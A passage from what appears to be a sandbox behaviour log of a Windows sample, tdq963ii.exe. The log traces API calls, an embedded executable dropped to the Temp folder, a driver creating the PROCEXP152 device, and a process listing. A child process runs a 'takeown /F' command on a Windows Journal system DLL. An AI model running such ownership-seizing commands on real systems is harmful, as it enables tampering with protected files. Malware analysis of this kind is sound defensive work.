cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.572] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.572] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0099.572] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0099.572] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x93\x0fZ\x19äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0099.573] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x80) returned 0x549240 [0099.587] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0099.587] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0099.587] RtlSizeHeap (HeapHandle=0x530000, Flags=0x0, MemoryPointer=0x549240) returned 0x80 [0099.588] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0099.588] GetProcAddress (hModule=0x76d30000, lpProcName="IsWow64Process") returned 0x76d4195e [0099.588] GetCurrentProcess () returned 0xffffffff [0099.588] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff34 | out: Wow64Process=0x18ff34) returned 1 [0099.588] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd28, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0099.588] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x18fb20, nSize=0x104 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x25 [0099.592] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0099.592] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0099.592] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0099.592] LockResource (hResData=0x43c648) returned 0x43c648 [0099.592] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x549710 [0099.593] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\tdq963ii64.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\tdq963ii64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x18f95c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0111.033] GetLastError () returned 0x20 [0111.033] GetLastError () returned 0x20 [0111.033] SetLastError (dwErrCode=0x20) [0111.033] GetLastError () returned 0x20 [0111.034] SetLastError (dwErrCode=0x20) [0111.034] GetLastError () returned 0x20 [0111.034] SetLastError (dwErrCode=0x20) [0111.034] GetLastError () returned 0x20 [0111.034] SetLastError (dwErrCode=0x20) [0111.034] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1000) returned 0x549730 [0111.036] GetLastError () returned 0x20 [0111.036] SetLastError (dwErrCode=0x20) [0111.036] GetLastError () returned 0x20 [0111.036] SetLastError (dwErrCode=0x20) [0111.036] GetLastError () returned 0x20 [0111.036] SetLastError (dwErrCode=0x20) [0111.036] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e38c | out: lpMode=0x18e38c) returned 1 [0111.047] WriteFile (in: hFile=0x7, lpBuffer=0x18ea68*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x18e394, lpOverlapped=0x0 | out: lpBuffer=0x18ea68*, lpNumberOfBytesWritten=0x18e394*=0x49, lpOverlapped=0x0) returned 1 [0111.062] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548810 | out: hHeap=0x530000) returned 1 [0111.062] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x18fedc | out: phModule=0x18fedc) returned 0 [0111.063] ExitProcess (uExitCode=0x1) [0111.065] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5470b0 | out: hHeap=0x530000) returned 1 Process: id = "29" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x38ece000" os_pid = "0x3a4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x9e0" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 52 os_tid = 0x598 Thread: id = 615 os_tid = 0x748 Process: id = "30" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "created_daemon" parent_id = "27" os_parent_pid = "0xffffffffffffffff" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 54 os_tid = 0x478 Thread: id = 55 os_tid = 0xcc Thread: id = 56 os_tid = 0xb18 Thread: id = 57 os_tid = 0x580 Thread: id = 58 os_tid = 0xd0 Thread: id = 59 os_tid = 0xbc Thread: id = 60 os_tid = 0x18 Thread: id = 61 os_tid = 0x5c4 Thread: id = 62 os_tid = 0x1c Thread: id = 63 os_tid = 0x5bc Thread: id = 64 os_tid = 0x4e4 Thread: id = 65 os_tid = 0x50 Thread: id = 66 os_tid = 0x7c Thread: id = 67 os_tid = 0x60 Thread: id = 68 os_tid = 0xd4 Thread: id = 69 os_tid = 0x328 Thread: id = 70 os_tid = 0x340 Thread: id = 71 os_tid = 0xa0 Thread: id = 72 os_tid = 0x650 Thread: id = 73 os_tid = 0x468 Thread: id = 74 os_tid = 0x584 Thread: id = 75 os_tid = 0x0 Thread: id = 76 os_tid = 0x648 Thread: id = 77 os_tid = 0x54c Thread: id = 78 os_tid = 0x570 Thread: id = 79 os_tid = 0x20 Thread: id = 80 os_tid = 0x474 Thread: id = 81 os_tid = 0x7f8 Thread: id = 82 os_tid = 0xf8 Thread: id = 83 os_tid = 0x24 Thread: id = 84 os_tid = 0x6f8 Thread: id = 85 os_tid = 0x6e4 Thread: id = 86 os_tid = 0x6d4 Thread: id = 87 os_tid = 0x6c4 Thread: id = 88 os_tid = 0x6b4 Thread: id = 89 os_tid = 0x6ac Thread: id = 90 os_tid = 0x84 Thread: id = 91 os_tid = 0x650 Thread: id = 92 os_tid = 0x590 Thread: id = 93 os_tid = 0x94 Thread: id = 94 os_tid = 0x488 Thread: id = 95 os_tid = 0x470 Thread: id = 96 os_tid = 0x68 Thread: id = 97 os_tid = 0x138 Thread: id = 98 os_tid = 0x3d8 Thread: id = 99 os_tid = 0x9c Thread: id = 100 os_tid = 0x88 Thread: id = 101 os_tid = 0x8c Thread: id = 102 os_tid = 0x5c Thread: id = 103 os_tid = 0x78 Thread: id = 104 os_tid = 0x308 Thread: id = 105 os_tid = 0x28c Thread: id = 106 os_tid = 0x74 Thread: id = 107 os_tid = 0x98 Thread: id = 108 os_tid = 0x34 Thread: id = 109 os_tid = 0x100 Thread: id = 110 os_tid = 0x198 Thread: id = 111 os_tid = 0x80 Thread: id = 112 os_tid = 0x158 Thread: id = 113 os_tid = 0x154 Thread: id = 114 os_tid = 0x150 Thread: id = 115 os_tid = 0x120 Thread: id = 116 os_tid = 0x90 Thread: id = 117 os_tid = 0x4c Thread: id = 118 os_tid = 0x130 Thread: id = 119 os_tid = 0x128 Thread: id = 120 os_tid = 0x124 Thread: id = 121 os_tid = 0x11c Thread: id = 122 os_tid = 0x118 Thread: id = 123 os_tid = 0xc4 Thread: id = 124 os_tid = 0x44 Thread: id = 125 os_tid = 0x28 Thread: id = 126 os_tid = 0x40 [0098.488] RtlInitUnicodeString (in: DestinationString=0xfffff88002fa4740, SourceString="PsAcquireProcessExitSynchronization" | out: DestinationString="PsAcquireProcessExitSynchronization") [0098.488] MmGetSystemRoutineAddress (SystemRoutineName="PsAcquireProcessExitSynchronization") returned 0xfffff80002c10d90 [0098.488] RtlInitUnicodeString (in: DestinationString=0xfffff88002fa4740, SourceString="PsReleaseProcessExitSynchronization" | out: DestinationString="PsReleaseProcessExitSynchronization") [0098.488] MmGetSystemRoutineAddress (SystemRoutineName="PsReleaseProcessExitSynchronization") returned 0xfffff80002c1f770 [0098.489] RtlInitUnicodeString (in: DestinationString=0xfffff88002fa4740, SourceString="ObGetObjectType" | out: DestinationString="ObGetObjectType") [0098.489] MmGetSystemRoutineAddress (SystemRoutineName="ObGetObjectType") returned 0xfffff80002b49b54 [0098.489] ObGetObjectType () returned 0xfffffa800184acd0 [0098.489] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x26, Tag=0x544f4550) returned 0xfffff8a002b0a660 [0098.489] ObOpenObjectByName (in: ObjectAttributes=0xfffff88002fa46a0, ObjectType=0xfffffa800184acd0, AccessMode=0x0, PassedAccessState=0x0, DesiredAccess=0xfffff880000f0001, ParseContext=0x0, Handle=0xfffff88002fa46f8 | out: ParseContext=0x0, Handle=0xfffff88002fa46f8*=0xffffffff800007b0) returned 0x0 [0098.489] ExFreePoolWithTag (P=0xfffff8a002b0a660, Tag=0x0) [0098.489] ObReferenceObjectByHandle (in: Handle=0xffffffff800007b0, DesiredAccess=0xf0001, ObjectType=0xfffffa800184acd0, AccessMode=0x0, Object=0xfffff88002fa4700, HandleInformation=0x0 | out: Object=0xfffff88002fa4700*=0xfffffa80018be570, HandleInformation=0x0) returned 0x0 [0098.489] ZwClose (Handle=0xffffffff800007b0) returned 0x0 [0098.489] ObfDereferenceObject (Object=0xfffffa80018be570) returned 0x2 [0098.489] RtlInitUnicodeString (in: DestinationString=0xfffff88002fa4758, SourceString="\\Device\\PROCEXP152" | out: DestinationString="\\Device\\PROCEXP152") [0098.489] RtlInitUnicodeString (in: DestinationString=0xfffff88002fa4778, SourceString="D:P(A;;GA;;;SY)(A;;GA;;;BA)" | out: DestinationString="D:P(A;;GA;;;SY)(A;;GA;;;BA)") [0098.489] RtlInitUnicodeString (in: DestinationString=0xfffff88002fa4670, SourceString="IoCreateDeviceSecure" | out: DestinationString="IoCreateDeviceSecure") [0098.489] MmGetSystemRoutineAddress (SystemRoutineName="IoCreateDeviceSecure") returned 0x0 [0098.489] RtlInitUnicodeString (in: DestinationString=0xfffff88002fa4670, SourceString="IoValidateDeviceIoControlAccess" | out: DestinationString="IoValidateDeviceIoControlAccess") [0098.489] MmGetSystemRoutineAddress (SystemRoutineName="IoValidateDeviceIoControlAccess") returned 0xfffff8000292d4c0 [0098.490] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x68, Tag=0x6c416553) returned 0xfffff8a002b15270 [0098.490] _wcsnicmp (_String1="A", _String2="A", _MaxCount=0x1) returned 0 [0098.490] _wcsnicmp (_String1="GA", _String2="RC", _MaxCount=0x2) returned -11 [0098.490] _wcsnicmp (_String1="GA", _String2="WD", _MaxCount=0x2) returned -16 [0098.490] _wcsnicmp (_String1="GA", _String2="WO", _MaxCount=0x2) returned -16 [0098.490] _wcsnicmp (_String1="GA", _String2="SD", _MaxCount=0x2) returned -12 [0098.490] _wcsnicmp (_String1="GA", _String2="GA", _MaxCount=0x2) returned 0 [0098.490] _wcsnicmp (_String1="SY", _String2="WD", _MaxCount=0x2) returned -4 [0098.490] _wcsnicmp (_String1="SY", _String2="BA", _MaxCount=0x2) returned 17 [0098.490] _wcsnicmp (_String1="SY", _String2="SY", _MaxCount=0x2) returned 0 [0098.490] RtlLengthSid (Sid=0xfffffa800184a8a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc [0098.490] RtlAddAccessAllowedAce (in: Acl=0xfffff8a002b15270, AceRevision=0x2, AccessMask=0x10000000, Sid=0xfffffa800184a8a0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: Acl=0xfffff8a002b15270) returned 0x0 [0098.490] _wcsnicmp (_String1="A", _String2="A", _MaxCount=0x1) returned 0 [0098.490] _wcsnicmp (_String1="GA", _String2="RC", _MaxCount=0x2) returned -11 [0098.491] _wcsnicmp (_String1="GA", _String2="WD", _MaxCount=0x2) returned -16 [0098.491] _wcsnicmp (_String1="GA", _String2="WO", _MaxCount=0x2) returned -16 [0098.491] _wcsnicmp (_String1="GA", _String2="SD", _MaxCount=0x2) returned -12 [0098.491] _wcsnicmp (_String1="GA", _String2="GA", _MaxCount=0x2) returned 0 [0098.491] _wcsnicmp (_String1="BA", _String2="WD", _MaxCount=0x2) returned -21 [0098.491] _wcsnicmp (_String1="BA", _String2="BA", _MaxCount=0x2) returned 0 [0098.491] RtlLengthSid (Sid=0xfffff8a000001840*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 0x10 [0098.491] RtlAddAccessAllowedAce (in: Acl=0xfffff8a002b15270, AceRevision=0x2, AccessMask=0x10000000, Sid=0xfffff8a000001840*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: Acl=0xfffff8a002b15270) returned 0x0 [0098.491] RtlCreateSecurityDescriptor (in: SecurityDescriptor=0xfffff88002fa4588, Revision=0x1 | out: SecurityDescriptor=0xfffff88002fa4588) returned 0x0 [0098.491] RtlSetDaclSecurityDescriptor (in: SecurityDescriptor=0xfffff88002fa4588, DaclPresent=1, Dacl=0xfffff8a002b15270, DaclDefaulted=0 | out: SecurityDescriptor=0xfffff88002fa4588) returned 0x0 [0098.491] RtlAbsoluteToSelfRelativeSD (in: AbsoluteSecurityDescriptor=0xfffff88002fa4588, SelfRelativeSecurityDescriptor=0x0, BufferLength=0xfffff88002fa45d0 | out: SelfRelativeSecurityDescriptor=0x0, BufferLength=0xfffff88002fa45d0) returned 0xc0000023 [0098.491] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x48, Tag=0x64536553) returned 0xfffff8a001c64150 [0098.491] RtlAbsoluteToSelfRelativeSD (in: AbsoluteSecurityDescriptor=0xfffff88002fa4588, SelfRelativeSecurityDescriptor=0xfffff8a001c64150, BufferLength=0xfffff88002fa45d0 | out: SelfRelativeSecurityDescriptor=0xfffff8a001c64150, BufferLength=0xfffff88002fa45d0) returned 0x0 [0098.491] ExFreePoolWithTag (P=0xfffff8a002b15270, Tag=0x0) [0098.492] IoCreateDevice (in: DriverObject=0xfffffa80036e8060, DeviceExtensionSize=0x0, DeviceName="\\Device\\PROCEXP152", DeviceType=0x8335, DeviceCharacteristics=0x0, Exclusive=0, DeviceObject=0xfffff88002fa46d0 | out: DeviceObject=0xfffff88002fa46d0) returned 0x0 [0098.492] RtlGetOwnerSecurityDescriptor (in: SecurityDescriptor=0xfffff8a001c64150, Owner=0xfffff88002fa4560, OwnerDefaulted=0xfffff88002fa4598 | out: Owner=0xfffff88002fa4560*=0x0, OwnerDefaulted=0xfffff88002fa4598) returned 0x0 [0098.492] RtlGetGroupSecurityDescriptor (in: SecurityDescriptor=0xfffff8a001c64150, Group=0xfffff88002fa4560, GroupDefaulted=0xfffff88002fa4598 | out: Group=0xfffff88002fa4560*=0x0, GroupDefaulted=0xfffff88002fa4598) returned 0x0 [0098.492] RtlGetSaclSecurityDescriptor (in: SecurityDescriptor=0xfffff8a001c64150, SaclPresent=0xfffff88002fa45a8, Sacl=0xfffff88002fa4568, SaclDefaulted=0xfffff88002fa4598 | out: SaclPresent=0xfffff88002fa45a8, Sacl=0xfffff88002fa4568, SaclDefaulted=0xfffff88002fa4598) returned 0x0 [0098.492] RtlGetDaclSecurityDescriptor (in: SecurityDescriptor=0xfffff8a001c64150, DaclPresent=0xfffff88002fa45a8, Dacl=0xfffff88002fa4568, DaclDefaulted=0xfffff88002fa4598 | out: DaclPresent=0xfffff88002fa45a8, Dacl=0xfffff88002fa4568, DaclDefaulted=0xfffff88002fa4598) returned 0x0 [0098.492] ObOpenObjectByPointer (in: Object=0xfffffa80019e2370, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x40000, ObjectType=0xfffffa8001933900, AccessMode=0xfffffa80036e8000, Handle=0xfffff88002fa45d0 | out: Handle=0xfffff88002fa45d0*=0xffffffff800007b0) returned 0x0 [0098.492] ZwSetSecurityObject (Handle=0xffffffff800007b0, SecurityInformation=0x4, SecurityDescriptor=0xfffff8a001c64150) returned 0x0 [0098.492] ZwClose (Handle=0xffffffff800007b0) returned 0x0 [0098.492] ExFreePoolWithTag (P=0xfffff8a001c64150, Tag=0x0) [0098.492] RtlInitUnicodeString (in: DestinationString=0xfffff88002fa4768, SourceString="\\DosDevices\\PROCEXP152" | out: DestinationString="\\DosDevices\\PROCEXP152") [0098.493] IoCreateSymbolicLink (SymbolicLinkName="\\DosDevices\\PROCEXP152", DeviceName="\\Device\\PROCEXP152") returned 0x0 Thread: id = 127 os_tid = 0x2c Thread: id = 128 os_tid = 0x48 Thread: id = 129 os_tid = 0x38 Thread: id = 130 os_tid = 0xb8 Thread: id = 131 os_tid = 0x3c Thread: id = 132 os_tid = 0xc0 Thread: id = 133 os_tid = 0xb0 Thread: id = 134 os_tid = 0x30 Thread: id = 135 os_tid = 0x8 Thread: id = 677 os_tid = 0x6cc Thread: id = 905 os_tid = 0x648 Process: id = "31" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x1741f000" os_pid = "0x104" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x4" cmd_line = "\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 136 os_tid = 0x180 Thread: id = 137 os_tid = 0x13c Thread: id = 138 os_tid = 0x10c Thread: id = 139 os_tid = 0x108 Process: id = "32" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0xebeb000" os_pid = "0x148" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xffffffffffffffff" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 140 os_tid = 0x1f4 Thread: id = 141 os_tid = 0x1b8 Thread: id = 142 os_tid = 0x1b4 Thread: id = 143 os_tid = 0x18c Thread: id = 144 os_tid = 0x16c Thread: id = 145 os_tid = 0x168 Thread: id = 146 os_tid = 0x164 Thread: id = 147 os_tid = 0x160 Thread: id = 148 os_tid = 0x14c Process: id = "33" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0xeef1000" os_pid = "0x178" os_integrity_level = "0x4000" os_privileges = "0x860b14080" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xffffffffffffffff" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 149 os_tid = 0x1d0 Thread: id = 150 os_tid = 0x194 Thread: id = 151 os_tid = 0x17c Process: id = "34" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0xe1ab000" os_pid = "0x184" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0xffffffffffffffff" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 152 os_tid = 0x9d0 Thread: id = 153 os_tid = 0x1d4 Thread: id = 154 os_tid = 0x1c8 Thread: id = 155 os_tid = 0x1bc Thread: id = 156 os_tid = 0x1a8 Thread: id = 157 os_tid = 0x1a4 Thread: id = 158 os_tid = 0x1a0 Thread: id = 159 os_tid = 0x19c Thread: id = 160 os_tid = 0x188 Thread: id = 682 os_tid = 0x4d0 Thread: id = 683 os_tid = 0xaa8 Thread: id = 846 os_tid = 0x99c Thread: id = 847 os_tid = 0xb84 Thread: id = 849 os_tid = 0xb04 Process: id = "35" image_name = "winlogon.exe" filename = 